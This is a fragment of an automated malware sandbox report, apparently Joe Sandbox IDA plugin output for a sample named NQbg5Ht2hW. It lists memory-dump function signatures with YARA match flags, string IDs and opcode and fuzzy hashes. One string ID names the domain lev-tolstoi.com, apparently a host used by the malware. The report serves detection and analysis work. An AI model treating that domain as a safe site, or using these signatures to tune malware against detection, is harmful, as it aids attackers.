                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 74028A76A483118BD724CF28D8817ABBBE2EBD2300F19852ED4C5D7392DB389945C786
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_710000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID: <pr$st$y./
                                                                                                                                                                                                                                                                        • API String ID: 0-3839595785
                                                                                                                                                                                                                                                                        • Opcode ID: 9e143f35872cbb7a2f64fee134240a1c59abbcbee3e9395d2d3f1030c864cd5b
                                                                                                                                                                                                                                                                        • Instruction ID: 074d2206f41a00f689705fe6483c703fe8e758f3fad41ab2211da7ba9af9f374
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9e143f35872cbb7a2f64fee134240a1c59abbcbee3e9395d2d3f1030c864cd5b
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 54C13972A083118BE7249F28C85266BB7E1EFD5314F19852DE99697383E73CDD06C392
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID: <pr$st$y./
                                                                                                                                                                                                                                                                        • API String ID: 0-3839595785
                                                                                                                                                                                                                                                                        • Opcode ID: a785fe897820364b60474d4d38e44689b11c67a14769611824ea7061f52dc378
                                                                                                                                                                                                                                                                        • Instruction ID: 75883d3ccedddef3a45dabbf5554b36173ac4c5341f315a2b5b284ed2e941cbb
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a785fe897820364b60474d4d38e44689b11c67a14769611824ea7061f52dc378
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A6C16872B083206BD7149B25D95263BB3E1EFD4314F59852EE88697381E6BCD805C39A
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_710000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID: 34$C]$|F
                                                                                                                                                                                                                                                                        • API String ID: 0-2804560523
                                                                                                                                                                                                                                                                        • Opcode ID: 1eada1f2f144597b9c88acb577afbeb3828b2161becaae570a9f1b2935c392b3
                                                                                                                                                                                                                                                                        • Instruction ID: 9611091228218dffde633def4e9c6f595f4d148dc15cf2dd284cc0b72ac973e6
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1eada1f2f144597b9c88acb577afbeb3828b2161becaae570a9f1b2935c392b3
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A9C1F0B69083618BD720CF28C88166BB3F2FF95314F58895CE8D58B390E779AD05C796
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID: 34$C]$|F
                                                                                                                                                                                                                                                                        • API String ID: 0-2804560523
                                                                                                                                                                                                                                                                        • Opcode ID: 7bec5bc3369f6adcf9dfe2aa521af371a2ac693f70b7f14cbe9fa8a8d0a997b9
                                                                                                                                                                                                                                                                        • Instruction ID: 2c432fa7c5999ab476cb5019d0599193357fe59285c965ab9162d9f100ef16a5
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7bec5bc3369f6adcf9dfe2aa521af371a2ac693f70b7f14cbe9fa8a8d0a997b9
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E2C1F1B59183118BC720CF28C8816ABB3F2FFD5314F58895DE8D58B390E778A945C79A
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID: #XXL$=$BC
                                                                                                                                                                                                                                                                        • API String ID: 0-2546488661
                                                                                                                                                                                                                                                                        • Opcode ID: de1a02a15010d669723b7442fb5946c988934c5b7e4ce427fae25988c8326dc7
                                                                                                                                                                                                                                                                        • Instruction ID: 9bd2012f957da0ff56630068cab070879dad6f1475f4ae026007fe123ff5be4b
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: de1a02a15010d669723b7442fb5946c988934c5b7e4ce427fae25988c8326dc7
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 62C1EBB15083518BD324CF15C8A17ABBBE2FFD1704F0A895ED4C55B3A1EBB88845CB96
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_710000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID: 12347$oQ3$sQ3
                                                                                                                                                                                                                                                                        • API String ID: 0-1755585375
                                                                                                                                                                                                                                                                        • Opcode ID: d6219592765054223d8b44a29d17a2c15be9e83531692649a6c6d0283300f812
                                                                                                                                                                                                                                                                        • Instruction ID: c5e7d944af1da45dd9df351cc89160cb35e3073080dcd6476cb81ffd8df2854f
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d6219592765054223d8b44a29d17a2c15be9e83531692649a6c6d0283300f812
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 16B15772A087518FC728CF28C89196BB7E2EBD5314F1A853CE99697351D735ED01CB82
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                                                                                        • String ID: 1234$oQ3$sQ3
                                                                                                                                                                                                                                                                        • API String ID: 2994545307-3057079318
                                                                                                                                                                                                                                                                        • Opcode ID: a6f3f14e2653e663308f11d691e247aa7faefb8ce40ce58f1613db28e40f636f
                                                                                                                                                                                                                                                                        • Instruction ID: 8038275947b79c29346f8cf0c7e67bd1178385f5d69ec54105c16415a8137388
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a6f3f14e2653e663308f11d691e247aa7faefb8ce40ce58f1613db28e40f636f
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8DB16472A083118FC728DF28C89056BB7E2EBC9314F19853DE99697365E735ED05CB82
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_710000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID: Ef$TQ][$sWK)
                                                                                                                                                                                                                                                                        • API String ID: 0-3401374238
                                                                                                                                                                                                                                                                        • Opcode ID: 34b98bce0e098604bc8c30d8401df6549c9b0a7e4ea807236a6bc4bf95e6afdf
                                                                                                                                                                                                                                                                        • Instruction ID: bc5268f5e09553fc03f0a0da0183ada454256111f48f09cf819df9b509997430
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 34b98bce0e098604bc8c30d8401df6549c9b0a7e4ea807236a6bc4bf95e6afdf
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8DB1F47051D3D08EE7398F2994907ABBBE0AFA7304F08499DD4D95B283D779850ACB63
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
Similarity
• API ID:
• String ID: Ef$TQ][$sWK)
• API String ID: 0-3401374238
• Opcode ID: 2018eb1ddcc6c4d2b6b82b9d22d54321858e2bd23606dd915e7f156b5046d053
• Instruction ID: 19a0c778187f2748ae17dd07c5e08606c1358576a23e797e2c0b4f31c76305c1
• Opcode Fuzzy Hash: 2018eb1ddcc6c4d2b6b82b9d22d54321858e2bd23606dd915e7f156b5046d053
• Instruction Fuzzy Hash: CBB1C33061C3E08ED7398F2994507ABBBE09F97304F48499DD4D95B382DB79850ACBA7
Strings
Memory Dump Source
• Source File: 00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_710000_NQbg5Ht2hW.jbxd
Yara matches
Similarity
• API ID:
• String ID: +|-~$/pqr$_
• API String ID: 0-1379640984
• Opcode ID: 6cec998220da979fd4d7e4802d464de526f10a737984141f1598214dad803a78
• Instruction ID: e7fa0a534902daa10b4b822e7f49f8fb2983ff4899161209f37c3395b0a23865
• Opcode Fuzzy Hash: 6cec998220da979fd4d7e4802d464de526f10a737984141f1598214dad803a78
• Instruction Fuzzy Hash: 73812C5160459006DB2CDF3888A773BBAD69F84308B2991BEC955CFBA7E93CC542874E
Strings
Memory Dump Source
• Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
Similarity
• API ID:
• String ID: +|-~$/pqr$_
• API String ID: 0-1379640984
• Opcode ID: 4a5a7f83b503959aed81fc9274c5a394571bb0f6731898145231dc30ce1a0eba
• Instruction ID: 042a524babaaaf1240c13a88dd3a117b8cd22f0ed9ec4b151ea40a3d869026f8
• Opcode Fuzzy Hash: 4a5a7f83b503959aed81fc9274c5a394571bb0f6731898145231dc30ce1a0eba
• Instruction Fuzzy Hash: D9810A5561495006DB2CDF3489A333BAAD79F84308B2991BFC995CFBABE93CC502874D
Strings
Memory Dump Source
• Source File: 00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_710000_NQbg5Ht2hW.jbxd
Yara matches
Similarity
• API ID:
• String ID: .$GetProcAddress.$l
• API String ID: 0-2784972518
• Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
• Instruction ID: 19e97ac46bf6416efbac014f9529ed7ba92719626634cde53c68d324d08253d9
• Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
• Instruction Fuzzy Hash: 08313CB6900609DFDB10CF99C884AEDBBF9FF48324F15404AD441A7351D7B5EA85CBA4
Strings
Memory Dump Source
• Source File: 00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_710000_NQbg5Ht2hW.jbxd
Yara matches
Similarity
• API ID:
• String ID: NDNK$WJeX$X
• API String ID: 0-3631875968
• Opcode ID: d11f5f5163d6808065bde529015e1f128c891bcdaf4957bf72f467d8a2f5d03f
• Instruction ID: e1f625e83518aa45f27767a19dea277b8a7b9ed8c681b4c9a6a7fbc19a50150e
• Opcode Fuzzy Hash: d11f5f5163d6808065bde529015e1f128c891bcdaf4957bf72f467d8a2f5d03f
• Instruction Fuzzy Hash: 5801DF7091D7A0CFD3B19F25995DA9FBFE4AB93310F20492CC4C9AB211DA3688418B03
Strings
Memory Dump Source
• Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
Similarity
• API ID:
• String ID: "51s$9YB
• API String ID: 0-2722061943
• Opcode ID: 211a046e9116838b58fef2f862f3bc43e5d0a454b8724f73db8adee7e8caa559
• Instruction ID: 779a5c1bb40158b59da43047085edf677e041d4ba635d65d9609cd33f89ab022
• Opcode Fuzzy Hash: 211a046e9116838b58fef2f862f3bc43e5d0a454b8724f73db8adee7e8caa559
• Instruction Fuzzy Hash: EE321976B00622CBCB24CF68D8516BFB3B2FF89310B99856DD442AB364DB395D41CB54
Strings
Memory Dump Source
• Source File: 00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_710000_NQbg5Ht2hW.jbxd
Yara matches
Similarity
• API ID:
• String ID: !@$,
• API String ID: 0-2321553346
• Opcode ID: 53d5da5660c4a43f8d0f64280c8733e9bdccf6cbe85e2db49c8b0f6515059a90
• Instruction ID: b91a595aaa6e468a56d1f0983ec4e2be84cf62d9ae069b0318e5d93148a6ec39
• Opcode Fuzzy Hash: 53d5da5660c4a43f8d0f64280c8733e9bdccf6cbe85e2db49c8b0f6515059a90
• Instruction Fuzzy Hash: 5842E7B1D042548FEB04CF78C8853AEBFF1AF45310F198669D895AB393D7398946CB92
Strings
Memory Dump Source
• Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
Similarity
• API ID:
• String ID: !@$,
• API String ID: 0-2321553346
• Opcode ID: 00a3d0f56e47fa8dbf69d309b3c8ad0eabeffacace6d1066a3ad4a95fdf331ff
• Instruction ID: 02546279eb0c4d83f3c4e3be5ab3571bc15c22c1dfd1b9922496e5385efd982e
• Opcode Fuzzy Hash: 00a3d0f56e47fa8dbf69d309b3c8ad0eabeffacace6d1066a3ad4a95fdf331ff
• Instruction Fuzzy Hash: DB4259B1E042648FDB04CF78D8813AEBFF1AF55310F59826ED895A7391C3798846CB86
Strings
Memory Dump Source
• Source File: 00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_710000_NQbg5Ht2hW.jbxd
Yara matches
Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID: Dx$lev-tolstoi.com
                                                                                                                                                                                                                                                                        • API String ID: 0-818776348
                                                                                                                                                                                                                                                                        • Opcode ID: ff34d217169f84ecf3502b05061dc3eb4241f1b5e2f3e4b9a9a76cc037eed5b2
                                                                                                                                                                                                                                                                        • Instruction ID: e9901d899e1ecd8fc4c3bf689ba5ca4b40839af553896fba0070c3503d225dc7
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ff34d217169f84ecf3502b05061dc3eb4241f1b5e2f3e4b9a9a76cc037eed5b2
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 53F1EEB050D3D18ED335CF698490BEBBFE1AB92714F144AADC8D95B682C735094ACB93
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID: Dx$lev-tolstoi.com
                                                                                                                                                                                                                                                                        • API String ID: 0-818776348
                                                                                                                                                                                                                                                                        • Opcode ID: ff34d217169f84ecf3502b05061dc3eb4241f1b5e2f3e4b9a9a76cc037eed5b2
                                                                                                                                                                                                                                                                        • Instruction ID: 5bb1130f72a98c6f233d2c217a903bc57bb56de3339a3108bfc93ec34e4a158e
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ff34d217169f84ecf3502b05061dc3eb4241f1b5e2f3e4b9a9a76cc037eed5b2
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A1F1CDB054C3D18ED335CF6594907EBBBE0EB92314F144AAEC8D96B382C735090A8B97
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_710000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID: 0K)$4*VP
                                                                                                                                                                                                                                                                        • API String ID: 0-3626284114
                                                                                                                                                                                                                                                                        • Opcode ID: 958d662d80f610fa8de2bec6fdd7d8beff1fa42db32f20cab0fd5fd8684a20d5
                                                                                                                                                                                                                                                                        • Instruction ID: 605d01770a6c98f55e2aed79c9300cb191b417242c63802f22d96fa611e8fc99
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 958d662d80f610fa8de2bec6fdd7d8beff1fa42db32f20cab0fd5fd8684a20d5
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D7D1F73161D3D08EE7358B3984507ABBBE19FA3314F18896DD4D98B383D7798806DB52
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID: 0K)$4*VP
                                                                                                                                                                                                                                                                        • API String ID: 0-3626284114
                                                                                                                                                                                                                                                                        • Opcode ID: 7f9184ee53db8657b7211f9213731764c2e24f7097ca2d92dc8b3e88ab6ab3dd
                                                                                                                                                                                                                                                                        • Instruction ID: 79d6e082e0491a4045e5b840a95bb4df230d34c241beba690eb3c8ed7007ce5a
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7f9184ee53db8657b7211f9213731764c2e24f7097ca2d92dc8b3e88ab6ab3dd
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8FD12730A1C3D08ED7258F3994507ABBFE19FA7314F59896ED4C98B382C7798406CB66
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID: R2B$6B
                                                                                                                                                                                                                                                                        • API String ID: 0-20043878
                                                                                                                                                                                                                                                                        • Opcode ID: ac58904699f18f78ac368c51fcd47e09c00d21abb36880cf37e6842ead4d4e32
                                                                                                                                                                                                                                                                        • Instruction ID: f5db2046e1d380e536cc29ae1ea4695f6a7d49829660d0c0f3bd76f15908f1aa
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ac58904699f18f78ac368c51fcd47e09c00d21abb36880cf37e6842ead4d4e32
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3AD1C276A01116CFDB18CF68DC917AE73B2FB8A311F1A85A9D841E7390DB34AD11CB58
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_710000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID: XG$|}
                                                                                                                                                                                                                                                                        • API String ID: 0-1014376750
                                                                                                                                                                                                                                                                        • Opcode ID: dab4d877ca047d4bef4a60ac035a74c1689232e455a040bcd58bfaed14168dbd
                                                                                                                                                                                                                                                                        • Instruction ID: f653c5ca14d7890f47510e45f621be689e2041867a2fe520e415902fe9c17150
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: dab4d877ca047d4bef4a60ac035a74c1689232e455a040bcd58bfaed14168dbd
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1CD103B15083448BD724CF18C8927ABB7F1FFD2354F49895CE5968B7A2E7798801CB52
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID: XG$|}
                                                                                                                                                                                                                                                                        • API String ID: 0-1014376750
                                                                                                                                                                                                                                                                        • Opcode ID: e601669f8485cc3344b93b58b39bec23c35c7299807bf4f05dda551d1a5ff6f0
                                                                                                                                                                                                                                                                        • Instruction ID: fef0f9a3622c059bd3dca30c9da84c32a684abbcbc54a65241ce9b590edefb0f
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e601669f8485cc3344b93b58b39bec23c35c7299807bf4f05dda551d1a5ff6f0
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: ECD122B16083108BD724DF18D8927ABB7F2FFE5354F49891DE5868B3A1E7788801CB56
Strings
Memory Dump Source
• Source File: 00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_710000_NQbg5Ht2hW.jbxd
Yara matches
Similarity
• API ID:
• String ID: )$IEND
• API String ID: 0-707183367
Strings
Memory Dump Source
• Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
Similarity
• API ID:
• String ID: )$IEND
• API String ID: 0-707183367
Strings
Memory Dump Source
• Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
Similarity
• API ID: InitializeThunk
• String ID: i$r}A
• API String ID: 2994545307-2976846027
Strings
Memory Dump Source
• Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
Similarity
• API ID:
• String ID: d$d
• API String ID: 0-195624457
Strings
Memory Dump Source
• Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
Similarity
• API ID:
• String ID: P<?$P<?
• API String ID: 0-3449142988
Strings
Memory Dump Source
• Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
Similarity
• API ID: InitializeThunk
• String ID: f
• API String ID: 2994545307-1993550816
Strings
Memory Dump Source
• Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
Similarity
• API ID:
• String ID: bC
• API String ID: 0-3681614764
Strings
Memory Dump Source
• Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
Similarity
• API ID:
• String ID: bC
